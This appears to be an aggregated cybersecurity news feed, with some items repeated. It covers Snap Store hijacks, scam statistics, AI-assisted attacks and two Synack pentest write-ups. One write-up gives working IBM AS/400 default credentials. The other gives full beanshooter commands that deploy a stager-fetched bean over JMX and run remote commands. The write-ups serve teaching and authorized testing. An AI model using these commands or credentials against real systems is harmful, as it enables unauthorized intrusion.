The darkness that swept over the Venezuelan capital in the predawn hours of Jan. 3, 2026, signaled a profound shift in the nature of modern conflict: the convergence of physical and cyber warfare. While U.S. special operations forces carried out the dramatic seizure of Venezuelan President Nicolás Maduro, a far quieter but equally devastating offensive was taking place in the unseen digital networks that help operate Caracas.

read more

Cryptocurrency hackers are exploiting trusted Linux software to steal digital assets, using a new technique that turns legitimate Snap Store packages into malware.

Rather than creating fresh accounts on the Snap Store, which is operated by Canonical, attackers are now taking over existing publisher accounts, according to a warning from Ubuntu contributor and former Canonical developer Alan Pope.

The method relies on identifying expired web domains and email addresses linked to long-standing Snap Store developers, registering those domains, and then using the recovered access to hijack Snapcraft accounts.

Attackers Turn Legitimate Packages Malicious

Once inside, the attackers push malicious updates to packages that were previously benign, catching users off guard through automatic updates and long-established trust signals.

The Snap Store, like other major package repositories, has long been a target for malware campaigns.

Early efforts were relatively unsophisticated, with scammers publishing fake crypto wallet applications under newly created accounts.

When those attempts became easier to detect, attackers began disguising malicious apps using lookalike characters from other alphabets to evade filters.

According to Pope, the tactic then evolved into a bait-and-switch approach. Attackers would publish harmless software under neutral names such as “lemon-throw” or “alpha-hub,” often posing as simple games. After approval and a period of inactivity, a follow-up update would quietly introduce a fake crypto wallet designed to steal funds.

The latest development raises the stakes. In at least two confirmed cases, attackers took control of expired domains once owned by legitimate Snap publishers and used them to distribute wallet-stealing malware through automatic updates.

The affected applications appeared normal on the surface but were built to harvest wallet recovery phrases and transmit them to attacker-controlled servers.

By the time users noticed suspicious behavior, funds and sensitive data were already compromised.

Canonical has since removed the malicious snaps, but Pope warned that the response highlights deeper weaknesses in the platform’s trust model.

He said domain takeovers undermine publisher longevity as a safety signal and called for additional safeguards, including monitoring domain expirations, enforcing stronger account verification for dormant publishers, and requiring mandatory two-factor authentication.

Security Researcher Warns of Delayed Snap Store Takedowns

Pope also noted delays in removing reported malicious snaps, sometimes stretching over several days.

He advised users to exercise extra caution when installing cryptocurrency wallets on Linux and to consider downloading them directly from official project websites instead of app stores.

To help users assess risk, Pope created SnapScope, a web-based tool that flags snaps as suspicious or malicious before installation.

He also urged developers to keep domain registrations active and secure Snapcraft and email accounts with two-factor authentication.

According to Chainalysis, illicit cryptocurrency addresses received a record $154 billion in 2025, a sharp increase from the year before.

In another case, US prosecutors have charged a 23-year-old Brooklyn resident, Ronald Spektor, with stealing roughly $16 million in cryptocurrency from around 100 Coinbase users through an alleged phishing and social engineering scheme.

The post Hackers Hijack Snap Store Accounts to Push Crypto-Stealing Malware on Linux appeared first on Cryptonews.

National Cyber Security Centre says these ideologically motivated attackers are moving beyond simple website disruptions.

The post NCSC Warns of Increased Russian Hacktivist Threat to UK Online Services appeared first on TechRepublic.

National Cyber Security Centre says these ideologically motivated attackers are moving beyond simple website disruptions.

The post NCSC Warns of Increased Russian Hacktivist Threat to UK Online Services appeared first on TechRepublic.

A sophisticated phishing campaign impersonating WhatsApp Web uses fake meeting links and QR codes to hijack accounts and enable real-time surveillance.

The post This WhatsApp Link Can Hand Over Your Account in Seconds appeared first on TechRepublic.

A sophisticated phishing campaign impersonating WhatsApp Web uses fake meeting links and QR codes to hijack accounts and enable real-time surveillance.

The post This WhatsApp Link Can Hand Over Your Account in Seconds appeared first on TechRepublic.

Impersonation scams exploded in 2025, growing by about 1,400% and driving some of the biggest losses seen in crypto fraud to date. According to analysis by Chainalysis, scammers used AI tools, voice cloning and fake customer-support schemes to scale up attacks, pushing total scam losses on chain into the low-double-digit billions.

Impersonation Scams Jump Dramatically

Reports have disclosed that the rise was not just in the number of cases but in how much each case cost victims. The average amount taken in impersonation schemes rose by over 600% compared with the prior year, a jump that turned many small cons into large heists. Chainalysis highlights the role of automated tooling and commercially available phishing services that let scammers run scams like factories.

Criminals Used AI And Deepfakes

Fraudsters leaned heavily on AI techniques in 2025. Based on reports, AI-generated voice and face clones, paired with very believable messages, helped criminals impersonate exchange staff, celebrities or close contacts. These methods increased both reach and success rates. Industry writeups and analysts show that AI-enabled scams were several times more profitable than older approaches.

One public example involved scammers posing as a major exchange and clearing nearly $16 million from victims in a single operation. That case became a headline because it showed how quickly an impersonation scam can turn into a mass theft when it uses polished fake identities and coordinated social engineering. Financial news outlets and industry trackers used that case to illustrate the shift in tactics.

Based on Chainalysis data, scam groups now resemble small businesses. They outsource parts of the fraud chain — writing scripts, buying deepfake clips, and hiring money movers. This setup made fraud more efficient and harder to disrupt. One analysis found AI-assisted schemes were about 4.5 times more profitable than traditional scams, a gap that attackers exploited to level up operations quickly.

Estimates of total crypto scam losses for 2025 vary by outlet, but multiple sources put the number well into the billions. Some trackers reported $14 billion in funds stolen on chain, while Chainalysis noted the figure could be as high as $17 billion once more data is tallied. The difference reflects how quickly new incidents were discovered and how some thefts moved off public rails.

Featured image from Unsplash, chart from TradingView

As the United States accelerates deployment of advanced and small modular reactors (A/SMRs), the nuclear energy sector is embracing a digital future. While digital systems provide operators with big benefits, they can also create vulnerabilities that enable criminals to access critical infrastructure.

To protect the next generation of reactors, cybersecurity has become a critical pillar of trust, safety and resilient operations.

read more

Last week, AI company Anthropic reported with ‘high confidence’ that a Chinese state-sponsored hacking group had weaponized Anthropic’s own AI tools to run a largely automated cyberattack on several technology firms and government agencies. According to the company, the September operation is the first publicly known case of an AI system conducting target reconnaissance with only minimal human direction.

read more

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

• Demographics of the dark web job seekers
• Their job preferences
• Top specializations on the dark web
• Job salaries
• Comparison between legal and shadow job markets

Get the report

by Gary Miliefsky, Publisher, Cyber Defense Magazine Every year, Black Hat showcases not just the latest innovations and products from the cybersecurity industry but also the presence of major government...

The post Federal Agency Makes Steampunk Appearance at Black Hat 2025 appeared first on Cyber Defense Magazine.

La operazione è stata poi rivendicata sul web da un gruppo di hacker che si presenta col nome di ‘DarkBit’. Il gruppo – riferiscono i media – ha …La operazione è stata poi rivendicata sul web da un gruppo di hacker che si presenta col nome di ‘DarkBit’. Il gruppo – riferiscono i media – ha …<img src="https://darkweb.today/wp-content/plugins/feedzy-rss-feeds/img/feedzy.svg" title="Attacco hacker al prestigioso ateneo israeliano Technion – Bluewin.ch” />Read More

Kemudian, hacker mencari celah dan berupaya mengatasi pembatasan ChatGPT tersebut. Ada obrolan aktif di forum underground yang mengungkapkan cara …Kemudian, hacker mencari celah dan berupaya mengatasi pembatasan ChatGPT tersebut. Ada obrolan aktif di forum underground yang mengungkapkan cara …<img src="https://darkweb.today/wp-content/plugins/feedzy-rss-feeds/img/feedzy.svg" title="Hacker Pakai ChatGPT Buat Bikin Malware – detikInet” />Read More

Popeax is a member of the Synack Red Team.

Often people think security research requires deep knowledge of systems and exploits, and sometimes it does, but in this case all it took was some curiosity and a Google search to find an alarmingly simple exploit using default credentials.

On a recent host engagement, I discovered an unusual login page running on port 8080, a standard but less often used HTTP port. The login page did not resemble anything I had encountered in the thousands of login pages across hundreds of client engagements.

Nothing new. Even for a seasoned member of the Synack Red Team (SRT), it isn’t unusual to discover commercial products that one hasn’t seen before.

The login page clearly showed the product as some type of IBM server. In the URL, I noticed the string “profoundui.” A quick Internet search identified an IBM resource that stated:

“Profound UI is a graphical, browser-based framework that makes it easy to transform existing RPG applications into Web applications, or develop new rich Web and mobile applications that run on the IBM i (previously known as the AS/400, iSeries, System i) platform using RPG, PHP, or Node.js.”

Given these facts, I Googled for “IBM AS/400 default password” and found IBM documentation that listed default AS/400 credentials.

As any elite hacker would do, I copied and pasted all six default usernames and passwords into the login form.

Sure enough the last set of credentials worked with user QSRVBAS and password QSRVBAS.

It was beyond the scope of the engagement to proceed any further to see how much access was possible. The vulnerability was documented in the report that was given to the client to be remediated.

After a few days, the client requested a patch verification of the vulnerability using Synack’s patch verification workflow. This workflow allows a client to request the SRT to verify an implemented patch within the Synack Platform. After receiving the patch verification request, I quickly verified the vulnerability was no longer exploitable.

It is hard to believe, but even today commercial products still ship and are installed with default credentials. Often the onus is on the end user to be aware they must change the credentials and lock the default accounts.

The ingenuity and curiosity of the SRT cannot be replicated by scanners or automated technology. The SRT members are adept at finding this type of vulnerability in custom and commercial applications, even while running in obscure locations, which leads to exploitable vulnerabilities being surfaced to the customer.

The post Exploits Explained: Default Credentials Still a Problem Today appeared first on Synack.

Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favorite ones are always host assessments. There, one can find a multitude of services with different configurations, versions and usage. One that always caused me trouble was the Java RMI case, until I decided to spend time reviewing the process step by step.

Throughout the years there were several targets where skilled Synack Red Team (SRT) members were able to successfully exploit vulnerabilities with Remote Code Execution, and this information in many cases was missing from my arsenal. I set a goal to find out how the exploitation was taking place and to be able to better understand the tools and methods to finding and exploiting it.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components like network switches or routers. Like SNMP, JMX is also used for monitoring Java-based applications. The most common use case for JMX is monitoring the availability and performance of a Java application server from a central monitoring solution like Nagios, Icinga or Zabbix.

JMX also shares another similarity with SNMP: While most companies only use the monitoring capabilities, JMX is actually much more powerful. JMX allows the user not only to read values from the remote system, it can also be used to invoke methods on the system.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard differs between various MBean types; however, we will only deal with the standard MBeans here. To be a valid MBean, a Java class must:

• Implement an interface
• Provide a default constructor (without any arguments)
• Follow certain naming conventions, for example implement getter/setter methods to read/write attributes

MBean server

An MBean server is a service that manages the MBeans of a system, which we’ll see demonstrated in an attack later in this post. Developers can register their MBeans in the server following a specific naming pattern. The MBean server will forward incoming messages to the registered MBeans. The service is also responsible for forwarding messages from MBeans to external components.

After we have a JMX service running on RMI, we can go through the various ways such a service might be attacked. Over time, various attack techniques have been discovered that are related to JMX over RMI, and we will step through most of them one by one.

Abusing available MBeans

Applications are able to register additional MBeans, which can then be invoked remotely. JMX is commonly used for managing applications, therefore the MBeans are often very powerful.

A failed start

Starting research on the topic, the first items that one will see are references to rmiscout, an exceptional tool on the time that was created but not maintained anymore for over two years with several issues on deployment. At that time I moved on BaRMie, which surprisingly is even older than rmiscout but easier to work with for basic recon. An alternative tool, under the name mjet, seems to be more updated and somewhat easier to use but still my results were poor. As one can see right away, many times simply taking a tool from the shelves and trying to work with it is not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run and that’s something that I was aware of from the start. But everybody is looking for shortcuts.  Back to reading then, and starting with posts such as this one and this one. I ended up on a relatively recent presentation from Tobias Neitzel, where he also presented his tools, RMG and Beanshooter.

New tools, new methods

With a better understanding and with a pair of excellent tools, the results were the following over the next months. 

On a target with several weeks already being launched, the RMI service was not noticed or exploited at that time. The following steps provided an RCE case.

Identifying:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  enum server_ip 9999

Tonka bean deployment:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 –stager-url http://tupoc:8888 –no-stager

On our Tupoc (external Synack collaborator system) 

Waiting for a callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded with a full RCE reward.

Not all cases will happen to be straightforward and in rare occasions issues might arise, but with better understanding of the process and the tools, we are always able to achieve better results.

References:
https://www.youtube.com/watch?v=t_aw1mDNhzI (Amazing work by Tobias Neitzel)
https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process, a few issues were identified in the tools that were handled swiftly and additionally an issue was created towards Glassfish repo under, https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

The art of cyber crime is in a constant state of flux and evolution. Simply staying on pace with these trends is a significant part of the CISO’s job.

Today’s modern CISO must ensure they are always prepared for the next big trend and remain ahead of adversaries.

As we begin to navigate 2023, the security landscape has transformed from a year ago, let alone a decade ago. The Russian invasion of Ukraine, emerging technologies like Web3 and AI, and new, post-pandemic ways of organizing the workforce have all led to significant shifts in the world of hacking.

In this article, we’ll look at how hacking is different in 2023, some of the key threats CISOs must contend with and some of the best defenses available.

What Does Modern Hacking Look Like?

Before we start, it’s worth noting that even the term “hacker” has undergone some evolution over the years. Once largely associated with hostile actors, many security professionals now refer to themselves as hackers. The term “white hat hacker” also exists; this refers to hackers using the same methods as cyber criminals to carry out ethical tasks like pressure-testing security systems.

So what are the concrete ways hacking has changed today compared to five, ten and even twenty years ago? There are several significant trends to highlight that look set to dominate the cybersecurity conversation in 2023.

A Lower Barrier to Entry

In the past, threat actors needed highly developed skill sets honed over many years. Hacking, especially targeting high-level organizations with valuable assets, wasn’t something just anyone could do — the bar was set high.

Today, with the emergence and growth of DIY hacking kits and services — available in places like the dark web — even fairly low-skilled cyber criminals can inflict damage and successfully commit crimes. This is concerning news because it means the pool of potential attackers is soaring.

Taking Advantage of the Shift to Remote Work

Although the COVID-19 pandemic is now receding, many effects still linger. One of the most notable is the sustained shift to remote working patterns. While more remote work options come with great employee benefits such as work-life balance and productivity, this style of working also carries inherent security risks.

With millions of companies now operating either partially or fully remote, along with escalating levels of cloud adoption, security teams have the challenging task of defending sensitive information and assets. Employees access all this data from a wide range of locations — including unsafe wireless networks and even public places.

Emerging Technologies Will Play a Greater Role

Emerging technologies like blockchain, the internet of things and artificial intelligence are expected to play a more prominent role in our lives in 2023, making them a more attractive target for attackers.

We’ve already seen a number of high-profile attacks on Web3 infrastructures, like the 2022 hacking of the Binance exchange for $570 million. Threat actors can also turn new technologies to their own advantage; for example, by harnessing AI tools to automate their attacks and quickly identify easy targets.

Bigger Targets and Heavyweight Players

The invasion of Ukraine in early 2022 sparked a new era of geopolitics, shifting the cybersecurity landscape. Russia has been targeting critical infrastructure in Ukraine with cyberattacks. As tensions between the West and its adversaries reach the highest point in decades, it’s realistic to expect more such attacks against Western targets.

CISOs at all levels must prepare for attacks by nation-state actors, which could even target assets like regional power grids.

What Will Be the Most Popular Hacking Methods of 2023?

Which techniques will malicious actors use to achieve their goals in 2023? While it’s difficult to predict, we’ll likely see a continuation of recent trends.

• Phishing. Despite  — or perhaps because of — its simplicity, phishing remains an extremely effective method for threat actors of all types. Tricking victims into sharing sensitive data, including company information, is a tried-and-tested attack vector that organizations must prepare for with widespread employee education and more robust password policies.
• DDoS attacks. Distributed Denial of Service attacks work by overwhelming the target’s servers with traffic, causing them to crash. In many cases, attackers are using cloud infrastructure to bolster their DDoS attacks.
• Ransomware. This method has been skyrocketing year over year and will probably trend upward in 2023. During an attack, malicious actors seize an organization or individual’s data, encrypt it and demand a ransom for its return. Ransomware can be devastating, leading to enormous financial losses and irreparable reputation damage.
• Targeting missing patches. Many threat actors are actively searching for security patches that organizations have failed to keep up to date. Then, they take advantage of those vulnerabilities.

What Does Defense Against Hacking Look Like in 2023?

As hacking continues to evolve, so do the methods cybersecurity teams are deploying to combat those threats.

Here are some of the key trends in defense against hacking to be aware of in 2023:

Automation and AI

AI is being harnessed by cyber criminals more and more, but when used correctly, it can also be a powerful tool for defense. AI algorithms are excellent at analyzing huge datasets and making accurate predictions about when and where attacks will take place, giving security teams a valuable advantage.

According to research by IBM, companies that use AI and automation to defend against data breaches save an average of $3.05 million compared to those that don’t — a difference of 65.2%.

Secure Cloud Assets

As cloud assets and infrastructure become increasingly popular targets, companies will focus on defending in this area. Stricter security controls, greater enforcement of access requirements and better education and coordination between teams are all excellent places to start.

Make Cybersecurity a Priority

The past few years have seen a growing trend of organizations taking a much more focused approach to cybersecurity with company-wide education policies and growing cyber spending.

As we enter 2023 and beyond, companies look certain to continue along this path, emphasizing security responsibility for everyone in the organization, not just security teams.

The post What CISOs Should Know About Hacking in 2023 appeared first on Security Intelligence.